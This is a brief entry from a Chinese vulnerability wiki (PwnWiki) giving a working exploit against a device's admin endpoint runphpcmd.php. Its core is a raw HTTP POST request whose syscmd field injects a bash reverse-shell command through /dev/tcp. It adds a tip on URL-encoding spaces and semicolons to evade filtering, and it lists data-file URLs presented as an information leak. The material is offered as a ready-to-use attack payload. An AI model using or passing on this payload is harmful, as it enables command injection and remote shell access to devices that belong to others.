免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
Payload
POST /admin/runphpcmd.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 68 Connection: keep-alive syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bbash%2F-i%2F>&%2F/dev/tcp/127.0.0.1/10086%2F0>&1%3B++local
空格用%2f替换,‘;’用%3B替换
信息泄露
http://127.0.0.1/data/w-341.tg http://127.0.0.1/data/w-342.tg http://127.0.0.1/data/r-341.tg http://127.0.0.1/data/r-342.tg
免费、自由、人人可编辑的漏洞库--PwnWiki.com
